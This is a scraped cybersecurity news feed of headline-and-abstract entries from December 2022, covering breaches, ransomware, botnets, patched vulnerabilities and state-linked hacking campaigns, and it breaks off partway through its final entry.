The Zerobot botnet has been upgraded to infect new devices by exploiting security vulnerabilities affecting Internet-exposed and unpatched Apache servers.BleepingComputer
December 21, 2022 – Vulnerabilities
Critical Vulnerabilities Found in Passwordstate Enterprise Password Manager Full Text
Abstract
Researchers discovered that the Passwordstate enterprise password manager made by Australian company Click Studios is affected by serious vulnerabilities that could allow an unauthenticated attacker to obtain a user’s passwords.Cyware
December 21, 2022 – Breach
Okta revealed that its private GitHub repositories were hacked this month Full Text
Abstract
American identity and access management giant Okta revealed that that its private GitHub repositories were hacked this month. Okta revealed that its private GitHub repositories were hacked this month, the news was first reported by BleepingComputer...Security Affairs
December 21, 2022 – Attack
Russians hacked JFK airport’s taxi dispatch system for profit Full Text
Abstract
Two U.S. citizens were arrested for allegedly conspiring with Russian hackers to hack the John F. Kennedy International Airport (JFK) taxi dispatch system to move specific taxis to the front of the queue in exchange for a $10 fee.BleepingComputer
December 21, 2022 – Phishing
Conti Team One Splinter Group Resurfaces as Royal Ransomware with Callback Phishing Attacks Full Text
Abstract
The threat actors running the ransomware — who used to be a part of Conti Team One, according to a mind map shared by Vitali Kremez — initially dubbed it Zeon ransomware, until they rebranded it to Royal ransomware.Cyware
December 21, 2022 – Breach
Shoemaker Ecco leaks over 60GB of sensitive data for 500+ days Full Text
Abstract
CyberNews researchers reported that Ecco, a global shoe manufacturer and retailer, exposed millions of documents. Original post @ https://cybernews.com/security/ecco-leaks-sensitive-data-for-months/ Ecco, a global shoe manufacturer and retailer,...Security Affairs
December 21, 2022 – Government
FBI warns of search engine ads pushing malware, phishing Full Text
Abstract
The FBI warns that threat actors are using search engine advertisements to promote websites distributing ransomware or stealing login credentials for financial institutions and crypto exchanges.BleepingComputer
December 21, 2022 – General
5 cybersecurity trends accelerating in 2023 Full Text
Abstract
The return of malware strains like Emotet, Conti, and Trickbot indicates an expansion of cybercrime for hire. Modern organizations rely on complex supply chains, including SMBs and MSPs.Cyware
December 21, 2022 – Attack
German industrial giant ThyssenKrupp targeted in a new cyberattack Full Text
Abstract
German multinational industrial engineering and steel production company ThyssenKrupp AG was the target of a cyberattack. German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services...Security Affairs
December 21, 2022 – Malware
GodFather Android malware targets 400 banks, crypto exchanges Full Text
Abstract
An Android banking malware named 'Godfather' has been targeting users in 16 countries, attempting to steal account credentials for over 400 online banking sites and cryptocurrency exchanges.BleepingComputer
December 21, 2022 – Criminals
Russian Killnet Hacker Group Claims Data Theft of 10,000 FBI Agents Full Text
Abstract
The Russian hacker group, KillNet, claims to have infiltrated an FBI database, allegedly stealing the personal information of more than 10,000 US federal agents. Like their other attacks, this alleged hack also appears to have political undertones.Cyware
December 21, 2022 – Breach
Okta’s source code stolen after GitHub repositories hacked Full Text
Abstract
In a 'confidential' email notification sent by Okta and seen by BleepingComputer, the company states that attackers gained access to its GitHub repositories this month and stole the company's source code.BleepingComputer
December 21, 2022 – Vulnerabilities
Critical Vulnerability in Hikvision Wireless Bridges Allows CCTV Hacking Full Text
Abstract
Chinese video surveillance company Hikvision has patched a critical vulnerability in some of its wireless bridge products. The flaw can lead to remote CCTV hacking, according to the researchers who found it.Cyware
December 21, 2022 – Breach
Antwerp denies negotiating ransomware payment as city disappears from leak site Full Text
Abstract
A listing for the City of Antwerp was removed from the PLAY ransomware group’s leak site this weekend, despite its mayor announcing that the municipality did not pay the gang to unlock its data.Cyware
December 21, 2022 – Attack
German Steel Production Giant ThyssenKrupp Targeted in a New Cyberattack Full Text
Abstract
At the time of reporting, the company is yet to disclose the type of attack that hit its systems and no cybercriminal group has yet claimed responsibility for the attack.Cyware
December 20, 2022 – Criminals
Ransomware gang uses new Microsoft Exchange exploit to breach servers Full Text
Abstract
Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA).BleepingComputer
December 20, 2022 – Malware
Newly Identified RisePro Malware is a Spin-off of Vidar Stealer Full Text
Abstract
RisePro stealer malware has been found targeting sensitive information on infected systems and harvesting data in the form of logs. It may have been dropped or downloaded by the pay-per-install malware downloader service PrivateLoader, finds Flashpoint. The malware first appeared on a Russian forum ... Read MoreCyware
December 20, 2022 – APT
UAC-0142 APT targets Ukraine’s Delta military intelligence program Full Text
Abstract
Ukraine’s CERT-UA revealed the national Delta military intelligence program has been targeted with a malware-based attack. On December 17, 2022, the Center for Innovations and Development of Defense Technologies of the Ministry of Defense of Ukraine...Security Affairs
December 20, 2022 – Solution
VirusTotal cheat sheet makes it easy to search for specific results Full Text
Abstract
VirusTotal has published a cheat sheet to help researchers create queries leading to more specific results from the malware intelligence platform.BleepingComputer
December 20, 2022 – Hacker
Russian hackers targeted petroleum refining company in NATO state Full Text
Abstract
A hacking group associated with Russia’s Federal Security Service (FSB) unsuccessfully attempted to compromise a large petroleum refining company within a NATO member state at the end of August, according to a new report.Cyware
December 20, 2022 – APT
Russia-linked Gamaredon APT targeted a petroleum refining company in a NATO nation in August Full Text
Abstract
Russia-linked Gamaredon APT group targeted a large petroleum refining company in a NATO state this year amid the invasion of Ukraine. The Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident...Security Affairs
December 20, 2022 – General
Microsoft will turn off Exchange Online basic auth in January Full Text
Abstract
Microsoft warned today that it will permanently turn off Exchange Online basic authentication starting early January 2023 to improve security.BleepingComputer
December 20, 2022 – Criminals
Infamous hacker steals 14 BAYCs worth over $1 million Full Text
Abstract
According to @serpent, the hacker contacted the victim and asked to license IP rights for BAYC #2060. They claimed to be a casting director for Forte Pictures, an L. A based Emmy Award-winning company. The alias the scammer used was fake.Cyware
December 20, 2022 – Vulnerabilities
Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS Full Text
Abstract
Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper. Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score:...Security Affairs
December 20, 2022 – Criminals
Google Ad fraud campaign used adult content to make millions Full Text
Abstract
A massive advertising fraud campaign using Google Ads and 'popunders' on adult sites is estimated to have generated millions of ad impressions on stolen articles, making the fraudsters an estimated $275k per month.BleepingComputer
December 20, 2022 – General
Connected homes are expanding, so is attack volume Full Text
Abstract
78% Americans report unsafe online behaviors that open them up to cyber threats, such as reusing or sharing passwords, skipping software updates and more – a 14% increase from just two years ago, according to Comcast.Cyware
December 20, 2022 – Attack
Hackers bombard PyPi platform with information-stealing malware Full Text
Abstract
The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data.BleepingComputer
December 20, 2022 – Attack
Attack Campaign Spreads Raspberry Robin Malware Across Europe, South America, and Oceania Full Text
Abstract
The group behind Raspberry Robin appears to be testing the waters to see how far its deployments can spread. Majority of the group’s victims are either government agencies or telecommunication entities from South America, Europe, and Oceania.Cyware
December 20, 2022 – Malware
Raspberry Robin worm drops fake malware to confuse researchers Full Text
Abstract
The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools.BleepingComputer
December 20, 2022 – Government
Cyber Command conducted offensive operations to protect midterm elections Full Text
Abstract
U.S. Cyber Command conducted both defensive and offensive operations to thwart foreign actors from interfering in the 2022 midterms, according to the digital combat unit’s chief.Cyware
December 20, 2022 – Botnet
Glupteba Botnet Rises from the Dead Full Text
Abstract
Experts at Nozomi Networks announced that they spotted an ongoing Glupteba botnet campaign, starting June 2022. Just a year ago, Google had claimed to dismantle the botnet’s infrastructure. Glupteba operators used the Bitcoin blockchain for hiding C&C domains, making it resilient to takedown ef ... Read MoreCyware
December 20, 2022 – Breach
Little Rock School District approves $250K payment in ransomware settlement Full Text
Abstract
While trying to retrieve stolen data from its network, the Little Rock School District’s board voted 6-3 on December 5 to approve a $250,000 settlement that would end a recent ransomware incident.Cyware
December 20, 2022 – Phishing
DarkTortilla Masquerades Grammarly, Cisco For Phishing Attacks Full Text
Abstract
Security analysts at Cyble observed two phishing sites imitating Grammarly and Cisco to distribute the DarkTortilla malware. The malware is capable of adding more RAT and stealer payloads, such as AgentTesla, AsyncRAT, NanoCore, and others to an infected system. The complex .NET-based malware has b ... Read MoreCyware
December 20, 2022 – Malware
Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware Full Text
Abstract
Researchers spotted a malicious package in the Python Package Index (PyPI) repository that impersonates a software development kit (SDK) for SentinelOne. Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named 'SentinelOne,'...Security Affairs
December 19, 2022 – Attack
Play ransomware claims attack on German hotel chain H-Hotels Full Text
Abstract
The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company.BleepingComputer
December 19, 2022 – Ransomware
How Reveton Ransomware-as-a-Service Changed Cybersecurity Full Text
Abstract
In 2012, Reveton ransomware emerged. It’s considered to be the first Ransomware-as-a-Service (RaaS) operation ever. Since then, RaaS has enabled gangs with basic technical skills to launch attacks indiscriminately.Cyware
December 19, 2022 – Vulnerabilities
Microsoft finds macOS bug that lets malware bypass security checks Full Text
Abstract
Apple has fixed a vulnerability that could be leveraged to deploy malware on vulnerable macOS devices via untrusted applications capable of bypassing Gatekeeper application execution restrictions.BleepingComputer
December 19, 2022 – Vulnerabilities
Cisco Warns of Many Old Vulnerabilities Being Exploited in Attacks Full Text
Abstract
Five of the updated advisories resolve critical-severity vulnerabilities that could allow remote attackers to execute arbitrary code (RCE), cause a denial-of-service (DoS) condition, or execute arbitrary commands.Cyware
December 19, 2022 – Vulnerabilities
Old vulnerabilities in Cisco products actively exploited in the wild Full Text
Abstract
IT giant Cisco is warning of threat actors exploiting many old vulnerabilities in attacks in the wild. Cisco has updated multiple security advisories to warn of the active exploitation of several old vulnerabilities impacting its products. The...Security Affairs
December 19, 2022 – Breach
DraftKings warns data of 67K people was exposed in account hacks Full Text
Abstract
Sports betting company DraftKings revealed last week that more than 67,000 customers had their personal information exposed following a credential attack in November.BleepingComputer
December 19, 2022 – Government
US Puts 3 Dozen More Chinese Companies on Trade Blacklist Full Text
Abstract
The U.S. Department of Commerce is adding 36 Chinese high-tech companies, including makers of aviation equipment, chemicals, and computer chips, to an export controls blacklist, citing concerns over national security, U.S. interests and human rights.Cyware
December 19, 2022 – Ransomware
Experts spotted a variant of the Agenda Ransomware written in Rust Full Text
Abstract
Researchers spotted a new variant of the Agenda ransomware which is written in the cross-platform programming language Rust. Trend Micro researchers have spotted a new variant of the Agenda ransomware (aka Qilin) that is written in Rust Language....Security Affairs
December 19, 2022 – Attack
Ukraine’s DELTA military system users targeted by info-stealing malware Full Text
Abstract
A compromised Ukrainian Ministry of Defense email account was found sending phishing emails and instant messages to users of the 'DELTA' situational awareness program to infect systems with information-stealing malware.BleepingComputer
December 19, 2022 – Phishing
Highly Sophisticated DarkTortilla Malware Spreads via Phishing Sites Disguising as Cisco and Grammarly Full Text
Abstract
Security researchers described DarkTortilla’s spreads to users through spam emails with malicious attachments. However, CRIL discovered that the Threat Actors responsible for DarkTortilla had built phishing websites to spread the malware.Cyware
December 19, 2022 – Government
US Gov warns of BEC attacks to hijack shipments of food products Full Text
Abstract
US government is warning of business email compromise (BEC) attacks aimed at hijacking shipments of food products and ingredients. The Federal Bureau of Investigation (FBI), the Food and Drug Administration Office of Criminal Investigations (FDA OCI),...Security Affairs
December 19, 2022 – Malware
Malicious ‘SentinelOne’ PyPI package steals data from developers Full Text
Abstract
Threat actors have published a malicious Python package on PyPI, named 'SentinelOne,' that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers.BleepingComputer
December 19, 2022 – Attack
Qakbot Attackers Manipulates SVG Files in HTML Smuggling Attack Full Text
Abstract
Phishing campaigns involving QBot malware as payload have started using a new technique. Hackers are using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows systems. This particular activity allows them to stay under the radar and bypass security tools that ... Read MoreCyware
December 19, 2022 – Botnet
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The Glupteba botnet is back, researchers reported a surge in infection worldwide after Google disrupted its operation in 2021. In December 2021, Google announced it has taken down the infrastructure operated by the Glupteba botnet, it also sued...Security Affairs
December 19, 2022 – Solution
UID smuggling: A new technique for tracking users online Full Text
Abstract
A group of researchers at UC San Diego have for the first time sought to quantify the frequency of UID smuggling in the wild, by developing a measurement tool called CrumbCruncher.Cyware
December 19, 2022 – Botnet
Glupteba botnet is back after Google disrupted it in December 2021 Full Text
Abstract
The blockchain-enabled botnet has been active since at least 2011, researchers estimated that the Glupteba botnet was composed of more than 1 million Windows PCs around the world as of December 2021.Cyware
December 19, 2022 – General
85% of attacks now use encrypted channels Full Text
Abstract
Malware continues to pose the greatest threat to individuals and businesses across nine key industries, with manufacturing, education and healthcare being the most commonly targeted, according to Zscaler.Cyware
December 18, 2022 – Breach
Restaurant CRM platform ‘SevenRooms’ confirms breach after data for sale Full Text
Abstract
SevenRooms, a restaurant CRM software and guest manRestaurant customer management platform SevenRooms has confirmed it suffered a data breach after a threat actor began selling stolen data on a hacking forum.agement service provider, has admitted it has suffered a data breach, result of a security incident on one of its vendors.BleepingComputer
December 18, 2022 – General
Security Affairs newsletter Round 398 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Samba...Security Affairs
December 18, 2022 – Policy and Law
T-Mobile hacker gets 10 years for $25 million phone unlock scheme Full Text
Abstract
Argishti Khudaverdyan, the former owner of a T-Mobile retail store, was sentenced to 10 years in prison for a $25 million scheme where he unlocked and unblocked cellphones by hacking into T-Mobile's internal systems.BleepingComputer
December 18, 2022 – Solution
Google announced end-to-end encryption for Gmail web Full Text
Abstract
Google introduces end-to-end encryption for Gmail web to its Workspace and education customers to protect emails sent using the web client. Google announced end-to-end encryption for Gmail (E2EE), with Gmail client-side encryption beta, users can send...Security Affairs
December 18, 2022 – Attack
Fire and rescue service in Victoria, Australia, confirms cyber attack Full Text
Abstract
The fire and rescue service in the state of Victoria, Australia, has shut down its network and turned to operating manually after a cyberattack. The fire and rescue service in the state of Victoria (FRV), Australia, has shut down its network after...Security Affairs
December 17, 2022 – Malware
Glupteba malware is back in action after Google disruption Full Text
Abstract
The Glupteba malware botnet has sprung back into action, infecting devices worldwide after its operation was disrupted by Google almost a year ago.BleepingComputer
December 17, 2022 – Solution
Google introduces end-to-end encryption for Gmail on the web Full Text
Abstract
Google announced on Friday that it's adding end-to-end encryption to Gmail on the web, allowing enrolled Google Workspace users to send and receive encrypted emails within their domain and outside their domain.BleepingComputer
December 17, 2022 – Vulnerabilities
Samba addressed multiple high-severity vulnerabilities Full Text
Abstract
Samba released updates to address multiple vulnerabilities that can be exploited to take control of impacted systems. Samba released updates to address multiple vulnerabilities, tracked as CVE-2022-38023, CVE-2022-37966, CVE-2022-37967, and CVE-2022-45141,...Security Affairs
December 16, 2022 – General
Want to Know What’s in That Online Mystery Box? NOTHING AT ALL Full Text
Abstract
Shoppers have been flocking to sites selling return pallets looking for great deals on holiday purchases. And as you might expect, scammers and bad actors have also seized on this trend.Cyware
December 16, 2022 – Ransomware
Agenda Ransomware Uses Rust to Target More Vital Industries Full Text
Abstract
The new Rust-based variant of Agenda ransomware has also been seen using intermittent encryption, one of the emerging tactics that threat actors use today for faster encryption and detection evasion.Cyware
December 16, 2022 – Business
Meta takes down surveillance-for-hire firms, calls for government action against the industry Full Text
Abstract
Meta revealed its latest actions in a report released Thursday that was accompanied by a policy paper offering 13 recommendations for confronting the surveillance-for-hire industry.Cyware
December 16, 2022 – Vulnerabilities
Critical IP spoofing bug patched in Cacti Full Text
Abstract
The vulnerability resides in a PHP file in Cacti that allows remote agents to run different actions on the server. The only safeguard this file offered was to check whether requests were coming from an authorized IP address.Cyware
December 16, 2022 – Ransomware
The Week in Ransomware - December 16th 2022 - Losing Trust Full Text
Abstract
Today's Week in Ransomware brings you the latest news and stories about the cyberattacks, new tactics, and reports related to ransomware operations.BleepingComputer
December 16, 2022 – Policy and Law
Former Twitter employee sentenced to 3.5 years in jail for spying on behalf of Saudi Arabia Full Text
Abstract
An ex Twitter employee has been sentenced to three-and-a-half years in prison for spying on individuals on behalf of Saudi Arabia. On august 2022, the former Twitter employee, Ahmad Abouammo (44), was found guilty of gathering private information...Security Affairs
December 16, 2022 – Attack
Colombian energy supplier EPM hit by BlackCat ransomware attack Full Text
Abstract
Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company's operations and taking down online services.BleepingComputer
December 16, 2022 – Breach
Social Blade discloses security breach Full Text
Abstract
Social media analytics service Social Blade disclosed a security breach after a database containing allegedly stolen data from the company was offered for sale. Social Blade is an American social media analytics platform, the company disclosed...Security Affairs
December 16, 2022 – Government
FBI warns that BEC attacks now also target food shipments Full Text
Abstract
Organizations in the food sector are now also targeted in business email compromise (BEC) attacks, according to a joint advisory issued by the FBI, the Food and Drug Administration Office of Criminal Investigations (FDA OCI), and the U.S. Department of Agriculture (USDA).BleepingComputer
December 16, 2022 – Breach
Data of 5.7M Gemini users available for sale on hacking forums Full Text
Abstract
Gemini crypto exchange warns users of an ongoing phishing campaign after a third-party vendor suffered a security breach. Gemini crypto exchange is warning of phishing campaigns targeting its users after a threat actor obtained their data by breaching...Security Affairs
December 16, 2022 – Policy and Law
Woman gets 66 months in prison for role in $3.3 million ID fraud op Full Text
Abstract
The Australian Federal Police (AFP) have announced today that a 24-year-old woman from Melbourne, arrested in 2019 for her role in large-scale, cyber-enabled identity theft crimes, was sentenced to five years and six months in prison.BleepingComputer
December 16, 2022 – Government
CISA adds Veeam Backup and Replication bugs to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added two vulnerabilities impacting Veeam Backup & Replication software to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities impacting Veeam Backup...Security Affairs
December 16, 2022 – Denial Of Service
Microsoft warns of new Minecraft DDoS malware infecting Windows, Linux Full Text
Abstract
A new cross-platform malware botnet named 'MCCrash' is infecting Windows, Linux, and IoT devices to conduct distributed denial of service attacks on Minecraft servers.BleepingComputer
December 16, 2022 – Botnet
MCCrash botnet targets private Minecraft servers, Microsoft warns Full Text
Abstract
Microsoft announced that a botnet dubbed MCCrash is launching distributed denial-of-service (DDoS) attacks against private Minecraft servers. Microsoft spotted a cross-platform botnet, tracked as MCCrash, which has been designed to launch distributed...Security Affairs
December 16, 2022 – Vulnerabilities
Microsoft revised CVE-2022-37958 severity due to its broader scope Full Text
Abstract
Microsoft revised the severity rate for the CVE-2022-37958 flaw which was addressed with Patch Tuesday security updates for September 2022. Microsoft revised the severity rate for the CVE-2022-37958 vulnerability, the IT giant now rated it as "critical"...Security Affairs
December 15, 2022 – Outage
FuboTV says World Cup streaming outage caused by a cyberattack Full Text
Abstract
FuboTV has confirmed that a streaming outage preventing subscribers from watching the World Cup Qatar 2022 semifinal match between France and Morocco was caused by a cyberattack.BleepingComputer
December 15, 2022 – Government
HHS Issues an Alert on LockBit 3.0 Attacks Full Text
Abstract
The HHS warned the healthcare and public health sector organizations against the rising number of LockBit 3.0 ransomware attacks, along with other ransomware and triple-extortion. The frequent attack vectors associated with ransomware are phishing, Remote Desktop Protocol (RDP), credentials, and kn ... Read MoreCyware
December 15, 2022 – Breach
Hackers leak personal info allegedly stolen from 5.7M Gemini users Full Text
Abstract
Gemini crypto exchange announced this week that customers were targeted in phishing campaigns after a threat actor collected their personal information from a third-party vendor.BleepingComputer
December 15, 2022 – Phishing
Laying Bare Charming Kitten’s Massive Campaign Full Text
Abstract
New phishing techniques by APT42, or Charming Kitten, have come to light that includes compromised accounts, malware, and confrontational lures. The researchers observed at least 60 campaigns this year, which relied on benign conversations to initiate contact with targets.Cyware
December 15, 2022 – APT
Chinese MirrorFace APT group targets Japanese political entities Full Text
Abstract
A Chinese-speaking APT group, tracked as MirrorFace, is behind a spear-phishing campaign targeting Japanese political entities. ESET researchers recently discovered a spear-phishing campaign targeting Japanese political entities and attributed it to the Chinese-speaking...Security Affairs
December 15, 2022 – General
GitHub to require all users to enable 2FA by the end of 2023 Full Text
Abstract
GitHub will require all users who contribute code on the platform to enable two-factor authentication (2FA) as an additional protection measure on their accounts by the end of 2023.BleepingComputer
December 15, 2022 – Malware
Hackers Use Microsoft-Signed Malicious Windows Drivers in Post-Exploitation Activity Full Text
Abstract
Microsoft revoked several hardware developer accounts after drivers signed through those profiles were leveraged by hackers in attacks, including ransomware incidents. Sophos revealed that Cuba ransomware operators used the BURNTCIGAR loader utility to install a malicious driver signed using Micros ... Read MoreCyware
December 15, 2022 – Breach
Database of the FBI’s InfraGard US Critical Infrastructure Intelligence portal available for sale Full Text
Abstract
The portal of the FBI's InfraGard US Critical Infrastructure Intelligence was hacked, and data is available for sale on a cybercrime forum. InfraGard is a partnership between the Federal Bureau of Investigation (FBI) and members of the private sector...Security Affairs
December 15, 2022 – Solution
GitHub rolls out free secret scanning for all public repositories Full Text
Abstract
GitHub is rolling out support for the free scanning of exposed secrets (such as credentials and auth tokens) to all public repositories on its code hosting platform.BleepingComputer
December 15, 2022 – Phishing
Operation LiberalFace Targeted Japanese Political Entities Before Elections Full Text
Abstract
ESET researchers discovered a spearphishing campaign targeting Japanese political entities a few weeks before the House of Councillors elections, and in the process uncovered a previously undescribed MirrorFace credential stealerCyware
December 15, 2022 – Criminals
FBI seized 48 domains linked to DDoS-for-Hire service platforms Full Text
Abstract
The U.S. Department of Justice (DoJ) seized forty-eight domains that offered DDoS-for-Hire Service Platforms to crooks. The U.S. Department of Justice (DoJ) this week announced the seizure of 48 domains associated with the DDoS-for-Hire Service platforms...Security Affairs
December 15, 2022 – Phishing
Phishing attack uses Facebook posts to evade email security Full Text
Abstract
A new phishing campaign uses Facebook posts as part of its attack chain to trick users into giving away their account credentials and personally identifiable information (PII).BleepingComputer
December 15, 2022 – Botnet
GoTrim Brute Forcer Botnet Scans Internet for WordPress Sites Full Text
Abstract
FortiGuard Labs identified an ongoing, previously unseen CMS scanner and brute forcer, dubbed GoTrim, installed in infected WordPress sites on Linux systems. The botnet detects and evades anti-bot techniques used by web hosting providers and CDNs, such as Cloudflare and SiteGround. WordPr ... Read MoreCyware
December 15, 2022 – Malware
Crooks use HTML smuggling to spread QBot malware via SVG files Full Text
Abstract
Talos researchers uncovered a phishing campaign distributing the QBot malware to Windows systems using SVG files. Talos researchers uncovered a phishing campaign distributing the QBot malware using a new technique that leverages Scalable Vector Graphics...Security Affairs
December 15, 2022 – Breach
Ukrainian govt networks breached via trojanized Windows 10 installers Full Text
Abstract
Ukrainian government entities were hacked in targeted attacks after their networks were first compromised via trojanized ISO files posing as legitimate Windows 10 installers.BleepingComputer
December 15, 2022 – Vulnerabilities
Mozilla Fixes Firefox Vulnerabilities That Could Have Lead to System Takeover Full Text
Abstract
Multiple high-impact vulnerabilities affecting Thunderbird, Firefox ESR, and Firefox were fixed by updates from Mozilla. The bugs might have given arbitrary code execution if they were successfully exploited.Cyware
December 15, 2022 – Breach
Social Blade confirms breach after hacker posts stolen user data Full Text
Abstract
Social media analytics platform Social Blade has confirmed they suffered a data breach after its database was breached and put up for sale on a hacking forum.BleepingComputer
December 15, 2022 – Ransomware
Royal Ransomware Puts Novel Spin on Encryption Tactics Full Text
Abstract
An emerging cybercriminal group linked with Conti has expanded its partial encryption strategy and demonstrates other evasive maneuvers, as it takes aim at healthcare and other sectors.Cyware
December 15, 2022 – Denial Of Service
How Gcore uses regular expressions to block DDoS attacks Full Text
Abstract
In DDoS Protection, Gcore uses the bundle of XDP and regular expressions (regex). This article will explain why Gcore started using this solution (regex in XDP) and how they bound them via a third-party engine and API development.BleepingComputer
December 15, 2022 – Hacker
Cyber warfare group caused AIIMS hack: sources - ET CISO Full Text
Abstract
A cyber warfare group backed by a “neighbouring” nation’s government was involved in the cyberattack on servers of the All India Institute of Medical Sciences (AIIMS), two sources aware of a government probe into the breach said.Cyware
December 15, 2022 – Vulnerabilities
LEGO BrickLink bugs let hackers hijack accounts, breach servers Full Text
Abstract
Security analysts have discovered two API security vulnerabilities in BrickLink.com, LEGO Group's official second-hand and vintage marketplace for LEGO bricks.BleepingComputer
December 15, 2022 – Vulnerabilities
Siemens Fixes 80 OpenSSL, OpenSSH Flaws in Switches Full Text
Abstract
Siemens released 20 new advisories addressing roughly 140 security holes, including more than 80 OpenSSL and OpenSSH vulnerabilities affecting its Scalance X-200RNA switches.Cyware
December 15, 2022 – Hacker
Hackers target Japanese politicians with new MirrorStealer malware Full Text
Abstract
A hacking group tracked as MirrorFace has been targeting Japanese politicians for weeks before the House of Councilors election in July 2022, using a previously undocumented credentials stealer named 'MirrorStealer.'BleepingComputer
December 15, 2022 – Outage
Ransomware-hit Rackspace email outage enters 12th day Full Text
Abstract
There's no end – or restored data – in sight for some Rackspace customers now on the 12th day of the company's ransomware attack-induced hosted Exchange email service outage.Cyware
December 14, 2022 – Criminals
FBI seized domains linked to 48 DDoS-for-hire service platforms Full Text
Abstract
The US Department of Justice has seized 48 Internet domains and charged six suspects for their involvement in running 'Booter' or 'Stresser' platforms that allow anyone to easily conduct distributed denial of service attacks.BleepingComputer
December 14, 2022 – Solution
Passkeys Now Fully Supported in Google Chrome Full Text
Abstract
Passkeys offer the same experience that password autofill does, but provide the advantage of passwordless authentication, eliminating the risks associated with phishing or the use of poor passwords.Cyware
December 14, 2022 – Malware
Attackers use SVG files to smuggle QBot malware onto Windows systems Full Text
Abstract
QBot malware phishing campaigns have adopted a new distribution method using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows.BleepingComputer
December 14, 2022 – Vulnerabilities
SAP’s December 2022 Security Updates Patch Critical Vulnerabilities Full Text
Abstract
With a CVSS score of 10, the most severe of SAP’s security notes updates a note released on April 2018 Patch Day, which deals with software updates for the Chrome-based browser in SAP Business Client.Cyware
December 14, 2022 – Vulnerabilities
Microsoft patches Windows zero-day used to drop ransomware Full Text
Abstract
Microsoft has fixed a security vulnerability used by threat actors to circumvent the Windows SmartScreen security feature and deliver Magniber ransomware and Qbot malware payloads.BleepingComputer
December 14, 2022 – Breach
Nosey Parker: Find sensitive information in textual data and Git history Full Text
Abstract
Nosey Parker addresses the pervasive problem of secret exposure in source code and configuration files where sensitive information such as passwords, API keys, access tokens, asymmetric private keys, client secrets, and credentials exist.Cyware
December 14, 2022 – Vulnerabilities
VMware fixes critical ESXi and vRealize security flaws Full Text
Abstract
VMware released security updates to address a critical-severity vulnerability impacting ESXi, Workstation, Fusion, and Cloud Foundation, and a critical-severity command injection flaw affecting vRealize Network Insight.BleepingComputer
December 14, 2022 – Breach
California hospital breach exposed patients’ Social Security numbers, medical info Full Text
Abstract
A hospital in California’s Riverside County has reported a data breach to its patients including sensitive information like Social Security numbers and the details of medical care following an incident in the fall.Cyware
December 14, 2022 – Government
NSA shares tips on mitigating 5G network slicing threats Full Text
Abstract
The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Office of the Director of National Intelligence (ODNI), have published a joint report that highlights the most likely risks and potential threats in 5G network slicing implementations.BleepingComputer
December 14, 2022 – Attack
‘Crisis Situation’ Declared as Two Swedish Municipalities Hit by Cyberattack Full Text
Abstract
An intrusion has been confirmed into the joint IT system used by the two municipalities of Borgholm and Mörbylånga, which together make up the island of Öland with a total population of just over 25,000.Cyware
December 14, 2022 – Criminals
The Dark Web is Getting Darker - Ransomware Thrives on Illegal Markets Full Text
Abstract
The dark web is getting darker as cybercrime gangs increasingly shop their malware, phishing, and ransomware tools on illegal cybercrime markets.BleepingComputer
December 14, 2022 – Government
Mapping Threat Intelligence to the NIST Compliance Framework Full Text
Abstract
Using the NIST Framework, organizations assess their current security posture, agree to organizational goals, understand their gaps, and develop plans to optimize their security posture.Cyware
December 14, 2022 – Phishing
Open-source repositories flooded by 144,000 phishing packages Full Text
Abstract
Unknown threat actors have uploaded a total of 144,294 phishing-related packages on the open-source package repositories NuGet, PyPI, and NPM.BleepingComputer
December 14, 2022 – General
What CISOs consider when building up security resilience Full Text
Abstract
Resilience has emerged as a top priority as 62 percent of organizations surveyed said they had experienced a security event that impacted business in the past two years, according to Cisco.Cyware
December 14, 2022 – Breach
TPG Reveals Emails of 15,000 iiNet and Westnet Customers Exposed in Email Hack Full Text
Abstract
TPG has not said what might have been obtained in the attack, but an investigation is ongoing and affected customers will be advised. It told the ASX the breach didn't affect mobile or broadband services, and access has been cut off for the attacker.Cyware
December 14, 2022 – Botnet
GoTrim botnet actively brute forces WordPress and OpenCart sites Full Text
Abstract
Researchers discovered a new Go-based botnet, dubbed GoTrim, attempting to brute force WordPress websites. Fortinet FortiGuard Labs researchers spotted a new Go-based botnet, dubbed GoTrim, that has been spotted scanning and brute-forcing WordPress...Security Affairs
December 14, 2022 – Vulnerabilities
December 2022 Patch Tuesday fixed 2 zero-day flaws Full Text
Abstract
Microsoft released December 2022 Patch Tuesday security updates that fix 52 vulnerabilities across its products. Microsoft December 2022 Patch Tuesday security updates addressed 52 vulnerabilities in Microsoft Windows and Windows Components; Azure;...Security Affairs
December 14, 2022 – Vulnerabilities
Apple fixed the tenth actively exploited zero-day this year Full Text
Abstract
Apple rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari to fix a new actively exploited zero-day (CVE-2022-42856). Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively...Security Affairs
December 14, 2022 – General
3.5m IP cameras exposed, with US in the lead Full Text
Abstract
